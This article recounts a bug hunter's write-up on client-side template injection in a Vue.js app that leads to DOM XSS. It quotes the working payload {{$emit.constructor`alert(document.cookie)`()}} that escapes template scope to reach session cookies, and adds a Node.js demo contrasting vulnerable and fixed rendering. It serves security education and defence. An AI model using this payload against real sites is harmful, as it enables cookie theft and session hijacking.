XSS Via CSTI – DOM XSS – Vue JS Execution Vulnerability – A bug hunter known as Amr recently documented a security flaw in a web application that shows the risk posed by Client-Side Template Injection (CSTI) when user input ends up inside a Vue.js template. Posted on Medium on February 16, 2024, Amr's write-up walks through how the vulnerability was found and exploited.
Amr's exploration started with thorough recon, combing through the web app for any possible weaknesses. Once he spotted the Vue.js framework in action and saw that his input was reflected into the page, he first probed for Server-Side Template Injection (SSTI). That line of attack went nowhere: Vue.js is a client-side template engine, so the template is compiled in the victim's browser, not on the server, and a successful injection cannot yield server-side code execution.
What it can yield is JavaScript execution in the victim's browser, i.e. DOM XSS. Amr therefore switched to treating the issue as CSTI and sent the classic probe in Vue's mustache syntax, {{alert(document.cookie)}}, hoping to trigger an alert and confirm that the expression was being evaluated.
That payload did not fire. Instead of guessing, Amr used the error messages Vue.js threw to learn how the injected expression was being evaluated: Vue resolves template expressions against the component instance rather than against the page's global scope, so a bare alert is not reachable from inside the template. He then probed with {{$emit.constructor}}. $emit is a method every Vue instance exposes, and the constructor of any ordinary function is the global Function constructor, which the page rendered back to him. From there he built the final payload, {{$emit.constructor`alert(document.cookie)`()}}: calling Function as a tagged template compiles the string alert(document.cookie) into a new function whose body runs in global scope, outside the template's restricted scope, and the trailing () invokes it, popping the alert box with the session cookie.
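The following is an added example, not code from Amr's write-up or from Vue.js itself. It is a toy template compiler that mimics how Vue evaluates {{ }} expressions against a proxied component scope, so the three steps above (blocked global, constructor probe, Function-based escape) can be replayed in Node.js, and it contrasts the vulnerable pattern (user input spliced into the template) with the fixed one (user input passed as data). The fake alert, document.cookie value and the instance shape are constructed for the example.

```javascript
// Added example (not from the original write-up or from Vue.js): a toy
// client-side template compiler modelling Vue's {{ }} scoping rules.
// window.alert and document are stand-ins so the effect is observable in Node.

const alerts = [];                                         // records alert() calls
globalThis.alert = (msg) => { alerts.push(String(msg)); };
globalThis.document = { cookie: "session=deadbeef" };     // constructed sample cookie

// A component instance as the template sees it: declared data plus the
// built-in $emit method. $emit is an ordinary function, so
// $emit.constructor is the global Function constructor.
function makeInstance(data) {
  return Object.assign({ $emit() {} }, data);
}

// Like Vue's runtime scope proxy: the proxy claims every identifier
// (has -> true) so lookups never fall through to the real globals;
// names the instance does not declare resolve to undefined.
function scopeProxy(instance) {
  return new Proxy(instance, {
    has: () => true,
    get: (target, key) => target[key],
  });
}

// Toy compiler: each {{ expr }} is evaluated as JS inside `with (scope)`.
// Real Vue compiles templates to render functions; the scoping is analogous.
function render(template, instance) {
  const scope = scopeProxy(instance);
  return template.replace(/\{\{([\s\S]*?)\}\}/g, (_, expr) => {
    const fn = new Function("scope", "with (scope) { return (" + expr + "); }");
    return String(fn(scope));
  });
}

// VULNERABLE: untrusted text is concatenated into the template source that
// the client then compiles, so mustaches inside it become live expressions.
function renderUserInputAsTemplate(userInput) {
  const template = "<p>Hello " + userInput + "</p>";
  try {
    return { html: render(template, makeInstance({})), error: null };
  } catch (e) {
    return { html: null, error: e.constructor.name + ": " + e.message };
  }
}

// FIXED: the template is static; untrusted text is a data property and is
// only ever interpolated as a value, never compiled.
function renderUserInputAsData(userInput) {
  return render("<p>Hello {{ name }}</p>", makeInstance({ name: userInput }));
}

function alertCount() { return alerts.length; }
function lastAlert() { return alerts[alerts.length - 1]; }

// Step 1: a direct alert() is blocked by the scope proxy and surfaces an error.
const step1 = renderUserInputAsTemplate("{{alert(document.cookie)}}");
// Step 2: probing $emit.constructor reveals the Function constructor.
const step2 = renderUserInputAsTemplate("{{$emit.constructor}}");
// Step 3: Function`body`() compiles the body in global scope, bypassing the proxy.
const step3 = renderUserInputAsTemplate("{{$emit.constructor`alert(document.cookie)`()}}");
// Same payload delivered as data renders as inert text.
const fixed = renderUserInputAsData("{{$emit.constructor`alert(document.cookie)`()}}");
```

The escape works because the Function constructor ignores the template's scope entirely: the new function is created in global scope, so alert and document resolve to the real (here, faked) browser globals. The fix is not to escape braces but to keep user-controlled strings out of the template source altogether; in real Vue, binding them through data or v-text also yields a text node, so HTML in the value stays inert as well.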
His report is a useful reminder for developers and security testers alike: a framework that compiles templates in the browser turns any reflection of user input into the template source into a JavaScript execution primitive, and restricting what template expressions can reach does not help once an attacker can obtain the Function constructor from an exposed instance method. The practical lessons are to keep untrusted input out of template source (bind it as data instead) and to test reflected parameters for mustache evaluation, not only for classic HTML injection.
Link to the full write-up: here